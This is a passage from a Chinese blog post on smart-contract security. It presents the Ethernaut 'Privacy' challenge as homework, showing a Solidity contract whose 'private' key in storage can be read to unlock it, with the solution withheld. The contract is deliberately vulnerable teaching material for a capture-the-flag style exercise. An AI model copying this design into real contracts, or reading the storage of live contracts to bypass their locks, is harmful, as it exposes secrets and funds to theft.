<p><img src="/2022/11/07/%E5%8C%BA%E5%9D%97%E9%93%BE%E9%AA%87%E5%AE%A2%E7%AC%AC%E5%9B%9B%E8%AE%B2-%E7%A0%B4%E8%A7%A3%E7%A7%81%E6%9C%89%E5%8F%98%E9%87%8F/3.png" srcset="/img/loading.gif" lazyload></p>
<h3 id="👨‍💻深度练习-课后作业"><a href="#👨‍💻深度练习-课后作业" class="headerlink" title="👨‍💻深度练习(课后作业)"></a>👨‍💻深度练习(课后作业)</h3><p>这是ethernaut的第12个例子~</p>
<p>现在把需求交给你：<mark>解锁该合约！！即让 locked &#x3D; false。</mark></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><code class="hljs solidity">// SPDX-License-Identifier: MIT<br>pragma solidity ^0.6.0;<br><br>contract Privacy &#123;<br><br>  bool public locked = true;<br>  uint256 public ID = block.timestamp;<br>  uint8 private flattening = 10;<br>  uint8 private denomination = 255;<br>  uint16 private awkwardness = uint16(now);<br>  bytes32[3] private data;<br><br>  constructor(bytes32[3] memory _data) public &#123;<br>    data = _data;<br>  &#125;<br>  <br>  function unlock(bytes16 _key) public &#123;<br>    require(_key == bytes16(data[2]));<br>    locked = false;<br>  &#125;<br><br>  /*<br>    A bunch of super advanced solidity algorithms...<br><br>      ,*&#x27;^`*.,*&#x27;^`*.,*&#x27;^`*.,*&#x27;^`*.,*&#x27;^`*.,*&#x27;^`<br>      .,*&#x27;^`*.,*&#x27;^`*.,*&#x27;^`*.,*&#x27;^`*.,*&#x27;^`*.,*&#x27;^`*.,<br>      *.,*&#x27;^`*.,*&#x27;^`*.,*&#x27;^`*.,*&#x27;^`*.,*&#x27;^`*.,*&#x27;^`*.,*&#x27;^         ,---/V\<br>      `*.,*&#x27;^`*.,*&#x27;^`*.,*&#x27;^`*.,*&#x27;^`*.,*&#x27;^`*.,*&#x27;^`*.,*&#x27;^`*.    ~|__(o.o)<br>      ^`*.,*&#x27;^`*.,*&#x27;^`*.,*&#x27;^`*.,*&#x27;^`*.,*&#x27;^`*.,*&#x27;^`*.,*&#x27;^`*.,*&#x27;  UU  UU<br>  */<br>&#125;<br></code></pre></td></tr></table></figure>



<blockquote>
<p>这道练习比前面那道有含金量多了，需要答案可以访问我的个人博客来联系我！</p>
</blockquote>
<p>这是我通过的交易hash(马蹄链测试网mumbai): <code>0xb5a6262202503ef74de1a98a870513fb8732a01bf23835db8f5ec39f71927866</code></p>
<h3 id="参考文献"><a href="#参考文献" class="headerlink" title="参考文献"></a>参考文献</h3><p><a target="_blank" rel="noopener" href="https://docs.ethers.io/v5/api/utils/strings/#Bytes32String">ethers.js-Strings-Bytes32String</a></p>
<p><a target="_blank" rel="noopener" href="https://betterprogramming.pub/solidity-storage-variables-with-ethers-js-ca3c7e2c2a64">Solidity Storage Variables with Ethers.js</a></p>
<p><a target="_blank" rel="noopener" href="https://learnblockchain.cn/docs/solidity/internals/layout_in_storage.html">状态变量在储存中的布局 — Solidity中文文档</a></p>
<p><a target="_blank" rel="noopener" href="https://learnblockchain.cn/article/4629">Ethernaut 题库闯关 #8 — Vault (learnblockchain.cn)</a></p>
<p><a target="_blank" rel="noopener" href="https://learnblockchain.cn/article/4651">Ethernaut 题库闯关 #12 — Privacy(learnblockchain.cn)</a></p>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
    <div class="post-meta mr-3 d-flex align-items-center">
      <i class="iconfont icon-category"></i>
      

<span class="category-chains">
  
  
    
      <span class="category-chain">
        
  <a href="/categories/%E5%8C%BA%E5%9D%97%E9%93%BE%E9%AA%87%E5%AE%A2/" class="category-chain-item">区块链骇客</a>
  
  

      </span>
    
  
</span>

    </div>
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/tags/%E5%90%88%E7%BA%A6%E5%AE%89%E5%85%A8%E5%AE%A1%E8%AE%A1-%E7%A7%81%E6%9C%89%E5%8F%98%E9%87%8F/">#合约安全审计 私有变量</a>
      
    </div>
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>区块链骇客第四讲-破解私有变量</div>
      <div>http://nangbowan.github.io/2022/11/07/区块链骇客第四讲-破解私有变量/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>Science_Jun</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2022年11月7日</div>
        </div>
      
      
      <div class="license-meta-item">
        <div>许可协议</div>
        <div>
          
            
            
              <a target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
              <span class="hint--top hint--rounded" aria-label="BY - 署名">
                <i class="iconfont icon-by"></i>
              </span>
              </a>
            
          
        </div>
      </div>
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2022/11/08/%E7%8B%A0%E4%BA%BA%EF%BC%81%E7%94%A8Python%E4%BB%8E%E9%9B%B6%E6%95%B2%E5%87%BA%E4%B8%80%E4%B8%AAEVM-1/" title="狠人！用Python从零敲出一个EVM-1">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">狠人！用Python从零敲出一个EVM-1</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2022/11/05/%E6%B7%B1%E5%85%A5%E6%B5%85%E5%87%BA%E4%BB%A5%E5%A4%AA%E5%9D%8A%E8%99%9A%E6%8B%9F%E6%9C%BA/" title="深入浅出以太坊虚拟机">
                        <span class="hidden-mobile">深入浅出以太坊虚拟机</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
  <article id="comments" lazyload>
    
  <div id="valine"></div>
  <script type="text/javascript">
    Fluid.utils.loadComments('#valine', function() {
      Fluid.utils.createScript('https://lib.baomitu.com/valine/1.4.17/Valine.min.js', function() {
        var options = Object.assign(
          {"appId":"LYBgVrYL1X3UGYD7wFo900Bz-9Nh9j0Va","appKey":"WVepGEwUKqFs0dVWeXeT8Gn8","path":"window.location.pathname","placeholder":null,"avatar":"retro","meta":["nick","mail"],"requiredFields":[],"pageSize":10,"lang":"zh-CN","highlight":true,"recordIP":true,"serverURLs":"","emojiCDN":null,"emojiMaps":null,"enableQQ":false},
          {
            el: "#valine",
            path: window.location.pathname
          }
        )
        new Valine(options);
        Fluid.utils.waitElementVisible('#valine .vcontent', () => {
          var imgSelector = '#valine .vcontent img:not(.vemoji)';
          Fluid.plugins.imageCaption(imgSelector);
          Fluid.plugins.fancyBox(imgSelector);
        })
      });
    });
  </script>
  <noscript>Please enable JavaScript to view the comments</noscript>


  </article>


          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;目录</p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
    <div class="statistics">
  
  

  
    
      <span id="leancloud-site-pv-container" style="display: none">
        总访问量 
        <span id="leancloud-site-pv"></span>
         次
      </span>
    
    
      <span id="leancloud-site-uv-container" style="display: none">
        总访客数 
        <span id="leancloud-site-uv"></span>
         人
      </span>
    
    

  
</div>

  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.0/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.18.2/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      headingSelector : CONFIG.toc.headingSelector || 'h1,h2,h3,h4,h5,h6',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      collapseDepth   : CONFIG.toc.collapseDepth || 0,
      scrollSmooth    : true,
      headingsOffset  : -boardTop
    });
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.10/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/4.3.1/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script defer src="/js/leancloud.js" ></script>

  <script  src="/js/local-search.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
</body>
</html>
